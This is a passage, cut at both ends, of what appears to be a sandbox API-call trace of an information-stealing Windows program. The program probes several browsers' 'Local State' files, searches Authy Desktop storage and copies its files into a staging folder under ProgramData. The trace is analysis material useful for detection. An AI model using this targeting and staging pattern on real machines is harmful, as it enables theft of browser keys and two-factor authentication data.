lpWideCharStr=0x0) returned 66 [0109.164] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x84) returned 0x3970048 [0109.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=66, lpWideCharStr=0x3970048, cchWideChar=66 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data\\\\Local State") returned 66 [0109.164] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x29a11c0 [0109.165] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.165] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\chedot\\user data\\local state")) returned 0xffffffff [0109.165] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.165] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.165] GetLastError () returned 0x3 [0109.165] SetLastError (dwErrCode=0x3) [0109.165] GetLastError () returned 0x3 [0109.165] SetLastError (dwErrCode=0x3) [0109.165] GetLastError () returned 0x3 [0109.165] SetLastError (dwErrCode=0x3) [0109.165] GetLastError () returned 0x3 [0109.165] SetLastError (dwErrCode=0x3) [0109.165] GetLastError () returned 0x3 [0109.165] SetLastError (dwErrCode=0x3) [0109.165] GetLastError () returned 0x3 [0109.165] SetLastError (dwErrCode=0x3) [0109.165] GetLastError () returned 0x3 [0109.165] SetLastError (dwErrCode=0x3) [0109.165] GetLastError () returned 0x3 [0109.165] SetLastError (dwErrCode=0x3) [0109.165] GetLastError () returned 0x3 [0109.165] SetLastError (dwErrCode=0x3) [0109.165] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x2080080, ftCreationTime.dwLowDateTime=0x98, ftCreationTime.dwHighDateTime=0x6c0260, ftLastAccessTime.dwLowDateTime=0x7f, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0x3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7464d0, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.166] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.166] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Microsoft\\Edge\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\" [0109.166] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\" [0109.166] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\\\" [0109.166] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\\\Local State" [0109.166] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=74, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0109.166] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x94) returned 0x3970048 [0109.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=74, lpWideCharStr=0x3970048, cchWideChar=74 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\\\Local State") returned 74 [0109.166] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a11c0 [0109.166] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.166] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\edge\\user data\\local state")) returned 0xffffffff [0109.166] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.166] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.166] GetLastError () returned 0x3 [0109.166] SetLastError (dwErrCode=0x3) [0109.166] GetLastError () returned 0x3 [0109.166] SetLastError (dwErrCode=0x3) [0109.166] GetLastError () returned 0x3 [0109.167] SetLastError (dwErrCode=0x3) [0109.167] GetLastError () returned 0x3 [0109.167] SetLastError (dwErrCode=0x3) [0109.167] GetLastError () returned 0x3 [0109.167] SetLastError (dwErrCode=0x3) [0109.167] GetLastError () returned 0x3 [0109.167] SetLastError (dwErrCode=0x3) [0109.167] GetLastError () returned 0x3 [0109.167] SetLastError (dwErrCode=0x3) [0109.167] GetLastError () returned 0x3 [0109.167] SetLastError (dwErrCode=0x3) [0109.167] GetLastError () returned 0x3 [0109.169] SetLastError (dwErrCode=0x3) [0109.169] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x2080090, ftCreationTime.dwLowDateTime=0xa8, ftCreationTime.dwHighDateTime=0x2080090, ftLastAccessTime.dwLowDateTime=0x19f010, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x15, ftLastWriteTime.dwHighDateTime=0x2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6ed1a8, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.169] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.169] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\360Browser\\Browser\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\" [0109.169] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\" [0109.169] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\\\" [0109.169] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\\\Local State" [0109.169] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=78, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0109.169] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x9c) returned 0x3970048 [0109.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=78, lpWideCharStr=0x3970048, cchWideChar=78 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\\\Local State") returned 78 [0109.169] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a11c0 [0109.169] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.169] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\360browser\\browser\\user data\\local state")) returned 0xffffffff [0109.170] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.170] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.170] GetLastError () returned 0x3 [0109.170] SetLastError (dwErrCode=0x3) [0109.170] GetLastError () returned 0x3 [0109.170] SetLastError (dwErrCode=0x3) [0109.170] GetLastError () returned 0x3 [0109.170] SetLastError (dwErrCode=0x3) [0109.170] GetLastError () returned 0x3 [0109.170] SetLastError (dwErrCode=0x3) [0109.170] GetLastError () returned 0x3 [0109.170] SetLastError (dwErrCode=0x3) [0109.170] GetLastError () returned 0x3 [0109.170] SetLastError (dwErrCode=0x3) [0109.170] GetLastError () returned 0x3 [0109.170] SetLastError (dwErrCode=0x3) [0109.170] GetLastError () returned 0x3 [0109.170] SetLastError (dwErrCode=0x3) [0109.170] GetLastError () returned 0x3 [0109.170] SetLastError (dwErrCode=0x3) [0109.170] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x2080098, ftCreationTime.dwLowDateTime=0xb0, ftCreationTime.dwHighDateTime=0x2080098, ftLastAccessTime.dwLowDateTime=0x19f010, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x16, ftLastWriteTime.dwHighDateTime=0x2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x717c78, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.171] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.171] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Tencent\\QQBrowser\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\" [0109.171] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\" [0109.171] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\\\" [0109.171] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\\\Local State" [0109.171] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=77, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0109.171] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x9a) returned 0x3970048 [0109.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=77, lpWideCharStr=0x3970048, cchWideChar=77 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\\\Local State") returned 77 [0109.171] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a11c0 [0109.171] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.171] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tencent\\qqbrowser\\user data\\local state")) returned 0xffffffff [0109.171] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.171] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.171] GetLastError () returned 0x3 [0109.171] SetLastError (dwErrCode=0x3) [0109.171] GetLastError () returned 0x3 [0109.172] SetLastError (dwErrCode=0x3) [0109.172] GetLastError () returned 0x3 [0109.172] SetLastError (dwErrCode=0x3) [0109.172] GetLastError () returned 0x3 [0109.172] SetLastError (dwErrCode=0x3) [0109.172] GetLastError () returned 0x3 [0109.172] SetLastError (dwErrCode=0x3) [0109.172] GetLastError () returned 0x3 [0109.172] SetLastError (dwErrCode=0x3) [0109.172] GetLastError () returned 0x3 [0109.172] SetLastError (dwErrCode=0x3) [0109.172] GetLastError () returned 0x3 [0109.172] SetLastError (dwErrCode=0x3) [0109.172] GetLastError () returned 0x3 [0109.172] SetLastError (dwErrCode=0x3) [0109.172] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Tencent\\QQBrowser\\User Data\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x2080096, ftCreationTime.dwLowDateTime=0xa8, ftCreationTime.dwHighDateTime=0x2080096, ftLastAccessTime.dwLowDateTime=0x19f010, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x15, ftLastWriteTime.dwHighDateTime=0x2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6ed988, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.172] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.172] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\CryptoTab Browser\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\" [0109.173] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\" [0109.173] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\\\" [0109.173] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\\\Local State" [0109.173] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=77, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0109.173] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x9a) returned 0x3970048 [0109.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=77, lpWideCharStr=0x3970048, cchWideChar=77 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\\\Local State") returned 77 [0109.173] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a11c0 [0109.173] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.173] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\cryptotab browser\\user data\\local state")) returned 0xffffffff [0109.173] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.173] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.173] GetLastError () returned 0x3 [0109.173] SetLastError (dwErrCode=0x3) [0109.173] GetLastError () returned 0x3 [0109.173] SetLastError (dwErrCode=0x3) [0109.173] GetLastError () returned 0x3 [0109.173] SetLastError (dwErrCode=0x3) [0109.173] GetLastError () returned 0x3 [0109.173] SetLastError (dwErrCode=0x3) [0109.173] GetLastError () returned 0x3 [0109.173] SetLastError (dwErrCode=0x3) [0109.173] GetLastError () returned 0x3 [0109.174] SetLastError (dwErrCode=0x3) [0109.174] GetLastError () returned 0x3 [0109.174] SetLastError (dwErrCode=0x3) [0109.174] GetLastError () returned 0x3 [0109.174] SetLastError (dwErrCode=0x3) [0109.174] GetLastError () returned 0x3 [0109.174] SetLastError (dwErrCode=0x3) [0109.174] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CryptoTab Browser\\User Data\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x2080096, ftCreationTime.dwLowDateTime=0xa8, ftCreationTime.dwHighDateTime=0x2080096, ftLastAccessTime.dwLowDateTime=0x19f010, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x15, ftLastWriteTime.dwHighDateTime=0x2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6ed988, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.174] GetLastError () returned 0x3 [0109.174] SetLastError (dwErrCode=0x3) [0109.174] GetLastError () returned 0x3 [0109.174] SetLastError (dwErrCode=0x3) [0109.174] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a10d0 [0109.174] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a1478 [0109.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=81, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0109.174] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa2) returned 0x3970048 [0109.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=81, lpWideCharStr=0x3970048, cchWideChar=81 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Authy Desktop\\Local Storage\\*.localstorage") returned 81 [0109.174] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xb0) returned 0x29a11c0 [0109.174] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.174] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Authy Desktop\\Local Storage\\*.localstorage", lpFindFileData=0x19f120 | out: lpFindFileData=0x19f120*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x29a04ba, nFileSizeLow=0x0, dwReserved0=0x77926588, dwReserved1=0x6000006, cFileName="8", cAlternateFileName="+")) returned 0xffffffff [0109.174] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.175] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x1c) returned 0x29a1428 [0109.175] FindNextFileW (in: hFindFile=0xffffffff, lpFindFileData=0x19f120 | out: lpFindFileData=0x19f120*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x29a04ba, nFileSizeLow=0x0, dwReserved0=0x77926588, dwReserved1=0x6000006, cFileName="8", cAlternateFileName="+")) returned 0 [0109.175] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.175] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a1478 [0109.175] CreateDirectoryA (lpPathName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\soft"), lpSecurityAttributes=0x0) returned 1 [0109.177] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.177] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a1478 [0109.177] CreateDirectoryA (lpPathName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\soft\\authy"), lpSecurityAttributes=0x0) returned 1 [0109.178] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.178] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1478 [0109.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=17, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0109.178] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x22) returned 0x29a14a0 [0109.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=17, lpWideCharStr=0x29a14a0, cchWideChar=17 | out: lpWideCharStr="files\\Soft\\Authy") returned 17 [0109.178] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x3970048 [0109.178] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a14a0 | out: hHeap=0x29a0000) returned 1 [0109.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1078, cbMultiByte=41, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0109.178] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x52) returned 0x3970080 [0109.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1078, cbMultiByte=41, lpWideCharStr=0x3970080, cchWideChar=41 | out: lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1") returned 41 [0109.178] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a11c0 [0109.178] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970080 | out: hHeap=0x29a0000) returned 1 [0109.182] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8e) returned 0x3970080 [0109.182] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0109.182] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2) returned 0x3970118 [0109.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8", cchWideChar=2, lpMultiByteStr=0x3970118, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8", lpUsedDefaultChar=0x0) returned 2 [0109.182] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970118 | out: hHeap=0x29a0000) returned 1 [0109.182] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a11c0 [0109.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a11c0, cbMultiByte=68, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0109.182] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x88) returned 0x29a1218 [0109.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a11c0, cbMultiByte=68, lpWideCharStr=0x29a1218, cchWideChar=68 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Authy Desktop\\Local Storage\\8") returned 68 [0109.182] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x3970330 [0109.182] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1218 | out: hHeap=0x29a0000) returned 1 [0109.182] CopyFileW (lpExistingFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Authy Desktop\\Local Storage\\8" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\authy desktop\\local storage\\8"), lpNewFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy\\8" (normalized: 